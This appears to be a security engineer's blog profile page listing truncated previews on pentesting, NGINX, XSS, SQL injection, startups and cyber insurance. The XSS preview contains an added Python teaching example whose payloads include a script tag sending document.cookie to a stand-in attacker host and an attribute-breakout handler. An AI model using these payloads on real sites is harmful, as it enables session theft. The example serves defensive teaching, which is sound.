You can be amazing at sniffing out application vulnerabilities, social engineering, or recon and still be basically useless in a real-life pentesting engagement. It’s a hard truth. Without a solid methodology, you are much more likely to waste time, miss critical vulnerabilities, and write an absolutely terrible report. A bad report means an unhappy client, and, more importantly, the inability to secure an environment.


I’m going to be honest here. This article is an act of selfish documentation. I’ve probably configured NGINX as a reverse proxy a few dozen times, and there’s always something I forget in the process. I still strongly prefer it over the Apache alternative, primarily due to its vastly different configuration language (it feels more like code, which is refreshing), among other benefits. I’ll leave the rest to another article.

Since configuring NGINX itself is really quite easy (though apparently hard for me to remember), I wanted to take this opportunity to explain how a reverse proxy actually works and…


Imagine you’re a thief (you can be the Robin Hood type if that helps) going into a business, looking for loot. You scour the storefront, and find nothing. You see a doorway to some stairs, and decide to see if you can go one floor down. You make it down one flight and check the knob — click click. It’s locked. You go down another flight, same deal. You keep moving down and checking knobs until, finally, you find an open door. Inside this room is the heart of the business — the money vault, the business’s files, etc…

This…


With the 2020 election(s) just around the corner, it’s getting harder to ignore the rhetoric, the ad waves, and the conspiracies. I remember when our opinions were not so dependent on our social media echo chambers. I remember when I could still be friends with people across the political aisle. It’s not that I don’t want to be now, it’s that the political climate over the past 4 years has become so polarizing that hating the other team has become a prerequisite for either party. The other guys are evil, they want to destroy this country. …


I feel like I’ve been writing just long enough to have figured out what works for me, and what really, really doesn’t. I write primarily technical articles dealing with programming and security — you know, really exciting stuff. Writing tech articles is such a weird balancing act that can so easily fall flat, making you sound either dull or uneducated on the subject. I'm going to talk about some of my own observations, and the many ways I’ve discovered that one can fail.

Research all the things

I rarely go into an article without either real-world experience or hours of research. Often, it’s both…


I’m sure you’ve heard of XSS (Cross-Site Scripting) if you’ve ever been within earshot of a security engineer. As part of the OWASP Top 10, it tends to pop up a lot in security discussions. Unfortunately, the standard explanation (“code injected into a webpage to make it do stuff”) doesn’t really help red or blue teams execute or protect against it.

A Better Explanation

Basically, XSS can occur when a user is allowed to provide input that will be used by the application in some way to alter a view in the interface, without properly sanitizing the user-supplied input. For instance, when you…
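The definition above is the whole story in one sentence: input flows into the view without contextual encoding. The following is an added example (not code from the original article) showing a hypothetical server-rendered search page that reflects the query, first concatenated straight into the markup, then encoded with Python's standard `html.escape`. It also shows why a home-grown "sanitizer" that only strips angle brackets fails when the same value lands inside an attribute. The payloads and the page fragments are constructed for the demonstration.

```python
"""Added example (not from the original article): reflected XSS in a
server-rendered page, shown unescaped, naively sanitized, and escaped.
The search page, its markup and the payloads are all constructed here."""
import html

# Constructed payload for an HTML text context: a script tag that would run
# in the victim's browser if the page reflected it verbatim.
SCRIPT_PAYLOAD = (
    '<script>document.location="https://attacker.example/?c="'
    '+document.cookie</script>'
)

# Constructed payload for a quoted-attribute context: no angle brackets at
# all, just a double quote to close the value and an event handler after it.
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'


def render_search_vulnerable(query: str) -> str:
    # Vulnerable: the user's query is concatenated into the markup, so any
    # tags it contains become part of the page's DOM.
    return f"<p>Results for: {query}</p>"


def render_search_escaped(query: str) -> str:
    # Hardened: contextual output encoding for an HTML text node. quote=True
    # also encodes " and ' so the same helper is safe for attribute values.
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def naive_sanitize(value: str) -> str:
    # A common mistake: strip angle brackets and call the input "sanitized".
    return value.replace("<", "").replace(">", "")


def render_input_naive(query: str) -> str:
    # Still vulnerable despite the sanitizer: the value sits inside a quoted
    # attribute, so a stray double quote ends the attribute and the rest of
    # the payload is parsed as new attributes (here an onfocus handler).
    return f'<input name="q" value="{naive_sanitize(query)}">'


def render_input_escaped(query: str) -> str:
    # Hardened: the quote becomes &quot; and cannot close the attribute.
    return f'<input name="q" value="{html.escape(query, quote=True)}">'


def contains_live_script(markup: str) -> bool:
    """Crude check used by this example: is there an unencoded <script
    tag in the rendered page? (A real test would render in a browser.)"""
    return "<script" in markup.lower()


def breaks_out_of_attribute(markup: str) -> bool:
    """Crude check: did the input add an unencoded onfocus=" handler?"""
    return ' onfocus="' in markup


if __name__ == "__main__":
    for fn in (render_search_vulnerable, render_search_escaped):
        print(fn.__name__, "->", fn(SCRIPT_PAYLOAD))
    for fn in (render_input_naive, render_input_escaped):
        print(fn.__name__, "->", fn(ATTR_PAYLOAD))
```

The point of the second pair is the one the standard explanation misses: "sanitizing" is not a property of the input, it is a property of where the input is placed. Encode for the context (text node, attribute, URL, JavaScript string) at output time, and use the platform's encoder rather than a blacklist of characters.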


As one of the most historically prominent vulnerabilities out there, SQL injections have likely caused millions (if not billions) of dollars worth of damages to thousands of companies over the last 20 years. The vulnerability was first documented in 1998 by Phrack contributor and security researcher Jeff Forristal. The internet never recovered.

So what is it?

To understand what a SQL Injection Attack is, we need to have a brief primer on how user interfaces typically communicate with the backend or database:


You had a great idea that is somehow also making money, and you’ve decided to bootstrap it into a full-fledged company. Congrats, you have a startup. In today’s market, it seems like we are all being pushed to build, grow, and sell — over and over and over. It seems like there’s no time to think about anything else. If you’re not developing something that will directly contribute to the product’s success, it seems like a waste of time.

This is the mindset of today’s startup founder. It’s the mindset of many CTOs and engineers pushing development forward without best…


I’m sure we’re all familiar with DRY programming principles. Don’t Repeat Yourself. Though I try my best to follow this when I’m developing an application, I feel like I’ve wasted countless hours on the same initial steps every time I start a project.

It seems like the first day is spent on setting up the directory structure I’ll use, looking up the same libraries every single time to make sure I initialize them properly, and writing the same CSS boilerplate over and over. If you did this a hundred times, you would have wasted a solid month of your life…


It’s not insurance for robots, but it’s still pretty cool. Cool in a nerdy, save yourself from disaster kind of way. Cyber Insurance seeks to offer a safety net for companies that are hit by cyber-attacks. Whether this is a data breach or a malicious attack on their technological resources doesn’t really matter. This new type of insurance is going to save a lot of companies in the coming years, in this ever-changing landscape of security uncertainty.

Who Needs It?

Are you a farmer with nothing but some mules and a wagon? You probably don’t need Cyber Insurance. If your business depends on…

Andrew Long

Security Engineer, Software Dev, and Tech Writer. I write a lot of tutorials and educational pieces, as well as the occasional opinion piece.
